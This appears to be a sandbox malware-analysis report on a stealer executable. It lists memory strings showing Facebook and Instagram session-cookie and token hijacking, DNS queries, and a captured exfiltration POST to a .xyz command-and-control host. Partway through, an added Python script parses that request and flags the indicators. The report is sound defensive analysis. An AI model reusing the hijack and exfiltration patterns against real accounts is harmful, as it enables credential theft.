Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe String found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: 84cfba021a5a6662.xyz
Source: unknown HTTP traffic detected: POST //fine/send HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 82
Host: 84cfba021a5a6662.xyz
Source: 56BB1610C0318054.exe, 00000004.00000003.259407630.0000000002F51000.00000004.00000001.sdmp String found in binary or memory: http://84CFBA021A5A6662.xyz/
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
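The C2 traffic above, as an added detection example that is not part of this report. The sandbox prints the captured POST with its CRLFs stripped, so the helper below first splits that flattened record back into a request line and header map (splitting on the header names the report shows, longest first so Accept-Language is not cut at Accept), then checks it and a set of resolver log lines against the indicators the report supplies: the Host 84cfba021a5a6662.xyz, the second host A5D4CE54CC78B3CA.xyz found in memory, and the POST path //fine/send. The regex that generalises those two hosts to any 16-hex-character .xyz name, and the DNS log lines, are assumptions and constructed data of mine, not facts from the report.

```python
"""Added example: recover the flattened HTTP request in the report and check it,
plus DNS log lines, against the C2 indicators the report lists.  Not part of
the original report; see the lead-in for what is assumed."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Indicators copied from the report: the POST path and the two .xyz hosts
# found in memory / DNS traffic.  HEX16_XYZ generalises those two hosts to
# "16 hex chars + .xyz"; that generalisation is an assumption, not a fact
# from the report, so it is reported as a weaker hit than an exact match.
C2_PATH = "//fine/send"
OBSERVED_HOSTS = {"84cfba021a5a6662.xyz", "a5d4ce54cc78b3ca.xyz"}
HEX16_XYZ = re.compile(r"^[0-9a-f]{16}\.xyz$", re.IGNORECASE)

# Header names present in the report's flattened request.  The sandbox dropped
# the CRLFs, so each value runs straight into the next header name; splitting
# on "<name>: " (longest names first, so Accept-Language wins over Accept)
# recovers the structure.
KNOWN_HEADERS = [
    "Cache-Control", "Connection", "Pragma", "Content-Type", "Accept",
    "Accept-Language", "User-Agent", "upgrade-insecure-requests",
    "Content-Length", "Host",
]
_HDR_SPLIT = re.compile(
    "(" + "|".join(re.escape(h) for h in sorted(KNOWN_HEADERS, key=len, reverse=True)) + "): ",
    re.IGNORECASE,
)


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)  # lower-cased header name -> value


def parse_flattened_request(blob: str) -> HttpRequest:
    """Turn 'POST //fine/send HTTP/1.1Cache-Control: no-cache...' back into a
    request line plus header map."""
    m = re.match(r"^(\S+) (\S+) (HTTP/\d\.\d)", blob)
    if not m:
        raise ValueError("no HTTP request line at start of record")
    req = HttpRequest(m.group(1), m.group(2), m.group(3))
    parts = _HDR_SPLIT.split(blob[m.end():])
    # parts = ['', 'Cache-Control', 'no-cache', 'Connection', 'Keep-Alive', ...]
    for name, value in zip(parts[1::2], parts[2::2]):
        req.headers[name.lower()] = value.strip()
    return req


def c2_indicators(req: HttpRequest) -> list[str]:
    """Return the report-derived indicators this request matches (empty = clean)."""
    hits = []
    host = req.headers.get("host", "").lower()
    if host in OBSERVED_HOSTS:
        hits.append(f"host {host} is a C2 host from the report")
    elif HEX16_XYZ.match(host):
        hits.append(f"host {host} fits the assumed 16-hex .xyz pattern")
    if req.method == "POST" and req.path == C2_PATH:
        hits.append(f"POST to {C2_PATH}")
    return hits


def suspicious_dns_queries(lines: list[str]) -> list[str]:
    """Pick queried names out of resolver log lines of the form '... query: <name> ...'
    and keep the ones matching the C2 hosts or the assumed host pattern."""
    found = []
    for line in lines:
        m = re.search(r"query: (\S+)", line)
        if not m:
            continue
        name = m.group(1).lower().rstrip(".")
        if name in OBSERVED_HOSTS or HEX16_XYZ.match(name):
            found.append(name)
    return found


# The request exactly as the report prints it (CRLFs already stripped by the sandbox).
REPORT_REQUEST = (
    "POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cache"
    "Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,"
    "application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
    "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; "
    "Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
    "upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz"
)

# Constructed resolver log lines (not from the report) mixing benign names seen
# in the report's string dump with the two C2 hosts.
CONSTRUCTED_DNS_LOG = [
    "client 10.0.0.15 query: www.msn.com IN A",
    "client 10.0.0.15 query: 84cfba021a5a6662.xyz IN A",
    "client 10.0.0.22 query: accounts.google.com IN A",
    "client 10.0.0.22 query: A5D4CE54CC78B3CA.xyz IN A",
]

if __name__ == "__main__":
    req = parse_flattened_request(REPORT_REQUEST)
    for name, value in req.headers.items():
        print(f"{name}: {value}")
    print("HTTP hits:", c2_indicators(req))
    print("DNS hits:", suspicious_dns_queries(CONSTRUCTED_DNS_LOG))
```

The exact-host and exact-path checks are the only ones backed by the report; the 16-hex .xyz pattern is a hunting heuristic and should be treated as a lead to confirm, not a verdict, since a legitimate host can fit it.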
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258939900.0000000002F4E000.00000004.00000001.sdmp String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 1611971443428.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611971443428.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611971443428.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Cyfj6XGbkd.exe String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 56BB1610C0318054.exe String found in binary or memory: http://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: http://docs.google.com/x
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 56BB1610C0318054.exe String found in binary or memory: http://drive.google.com/
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_use
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 1611971443428.exe.2.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0B
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0E
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0F
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0K
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0M
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0P
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0R
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: Cyfj6XGbkd.exe String found in binary or memory: http://ocsp.thawte.com0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: Cyfj6XGbkd.exe String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Cyfj6XGbkd.exe String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Cyfj6XGbkd.exe String found in binary or memory: http://sf.symcd.com0&
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
